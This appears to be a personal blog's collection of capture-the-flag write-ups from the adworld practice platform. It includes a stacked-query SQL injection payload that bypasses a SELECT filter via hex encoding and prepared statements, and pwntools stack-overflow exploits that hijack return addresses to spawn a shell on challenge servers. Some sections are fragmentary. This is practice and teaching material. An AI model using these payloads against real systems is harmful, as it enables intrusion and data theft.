攻防世界 (adworld): I Am a Noob

date: Aug 5, 2021 12:17 PM
Related to: 日程数据 1 (blog)
tags: Writeup
slug: web2
summary: go on

0x0e supersqli

Because select is filtered, first hex-encode select * from 1919810931114514, then build the payload

;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

which yields the flag.

prepare ... from ... is a prepared statement and performs the encoding conversion (the hex literal is turned back into statement text before it is parsed, so the filtered keyword never appears literally in the request). execute runs the SQL statement created by SQLPrepare. SELECT can assign to several variables in one statement, whereas SET can only assign to one variable at a time.
 
 
 

open-source

#include <stdio.h>
#include <stdlib.h>   /* atoi, exit */
#include <string.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        printf("what?\n");
        exit(1);
    }

    /* argv[1] must equal 0xcafe (51966 in decimal) */
    unsigned int first = atoi(argv[1]);
    if (first != 0xcafe) {
        printf("you are wrong, sorry.\n");
        exit(2);
    }

    /* argv[2] must satisfy second % 5 != 3 and second % 17 == 8 */
    unsigned int second = atoi(argv[2]);
    if (second % 5 == 3 || second % 17 != 8) {
        printf("ha, you won't get it!\n");
        exit(3);
    }

    /* argv[3] must be exactly "h4cky0u" */
    if (strcmp("h4cky0u", argv[3])) {
        printf("so close, dude!\n");
        exit(4);
    }

    printf("Brr wrrr grr\n");

    /* only second % 17 (always 8 here) and strlen(argv[3]) feed the key,
       so every valid argument set produces the same key */
    unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;

    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}
atoi (stands for ASCII to integer); 51966 is 0xcafe in decimal, and 25 satisfies both 25 % 5 != 3 and 25 % 17 == 8.

./string 51966 25 h4cky0u

Or just evaluate the key expression directly:
#include <stdio.h>
#include <string.h>

int main() {
    /* same expression as the challenge, with the known values substituted */
    unsigned int hash = 0xcafe * 31337 + 8 * 11 + strlen("h4cky0u") - 1615810207;

    printf("Get your key: ");
    printf("%x\n", hash);

    return 0;
}

hello ctf

 

simple-unpack

 
It's packed.
 

logmein

 
 
Rename with N as appropriate.
var28 = "harambe"               # key recovered from the stack constant
var20 = ":\"AL_RT^L*.?+6/46"    # encoded flag bytes
flag = ""

for i in range(len(var20)):
    f = ord(var20[i]) ^ ord(var28[i % 7])   # XOR with the repeating 7-byte key
    flag += chr(f)
print(flag)
 
 

no-strings-attached

Press X to follow the cross-references.
It needs decrypting.
buf = [
0x3a,0x14,0x00,0x00,0x36,0x14,0x00,0x00,0x37,0x14,0x00,0x00,0x3b,0x14,0x00,
0x00,0x80,0x14,0x00,0x00,0x7a,0x14,0x00,0x00,0x71,0x14,
0x00,0x00,0x78,0x14,0x00,0x00,0x63,0x14,0x00,0x00,0x66,
0x14,0x00,0x00,0x73,0x14,0x00,0x00,0x67,0x14,0x00,0x00,
0x62,0x14,0x00,0x00,0x65,0x14,0x00,0x00,0x73,0x14,0x00,
0x00,0x60,0x14,0x00,0x00,0x6b,0x14,0x00,0x00,0x71,0x14,
0x00,0x00,0x78,0x14,0x00,0x00,0x6a,0x14,0x00,0x00,0x73,
0x14,0x00,0x00,0x70,0x14,0x00,0x00,0x64,0x14,0x00,0x00,
0x78,0x14,0x00,0x00,0x6e,0x14,0x00,0x00,0x70,0x14,0x00,
0x00,0x70,0x14,0x00,0x00,0x64,0x14,0x00,0x00,0x70,0x14,
0x00,0x00,0x64,0x14,0x00,0x00,0x6e,0x14,0x00,0x00,0x7b,
0x14,0x00,0x00,0x76,0x14,0x00,0x00,0x78,0x14,0x00,0x00,
0x6a,0x14,0x00,0x00,0x73,0x14,0x00,0x00,0x7b,0x14,0x00,
0x00,0x80,0x14,0x00,0x00]
# the string is stored as 4-byte wide characters; keep only the low byte of each
f = []
for i in range(0, len(buf), 4):
    f.append(buf[i])
print(f)
fl = ""
nu = [1, 2, 3, 4, 5]
for j in range(len(f)):
    fl += chr(f[j] - nu[j % 5])   # subtract the repeating 1..5 key
print(fl)
 

getit

s = 'c61b68366edeb7bdce3c6820314b7498'
flag = ''
for i in range(len(s)):
    if i & 1:
        t = 1     # odd index: +1
    else:
        t = -1    # even index: -1
    flag += chr(ord(s[i]) + t)
print(flag)

# result: b70c59275fcfa8aebf2d5911223c6589
 

csaw2013reversing2

When opening it, "load in write mode" must be checked.

Reference
 
 
 
 

EasyRE

 
Saw something strange.
It's a decoy.

Reverse the algorithm.

Didn't work out.
 
 
 

level0

Nothing much here.
There's a hint; click into it.
You can input 0x200 bytes, but buf is only 0x80 long.
from pwn import *
r = remote("111.200.241.244", 58379)   # challenge server
# 0x80 buffer plus 0x8 for the saved rbp (popped by leave), then overwrite ret with the start of callsystem
payload = b'A' * 0x80 + b'a' * 0x8 + p64(0x00400596)
r.recvuntil(b"Hello, World\n")  # wait for the banner (p.recv() would just read whatever is there)
r.sendline(payload)   # send the payload
r.interactive()       # hand over to interactive mode
 
 

level2

 
The vulnerable function comes first.
0x88-byte buffer, overflowable by the 0x100-byte read.
Find the address of the system function we want to jump to: 0x08048320
We need system('/bin/shell'); the string is found at 0x0804a024
Build the payload:

payload=b'a'*(0x88+0x4)+p32(0x08048320)+p32(0)+p32(0x0804a024)
from pwn import *
p = remote('111.200.241.244', 60256)
# alternative: return to the call system instruction, so no fake return address is needed
# payload = b'a' * (0x88 + 0x4) + p32(0x0804845c) + p32(0x0804A024)
# 0x88 buffer + 0x4 saved ebp, then the system address, a dummy return address, and the string pointer
payload = b'a' * (0x88 + 0x4) + p32(0x08048320) + p32(0) + p32(0x0804a024)
# p.recvuntil(b"Input:\n")
p.recv()
p.sendline(payload)
p.interactive()
Both approaches work.
 
 

level3

 
 

© lewoking 2021 - 2022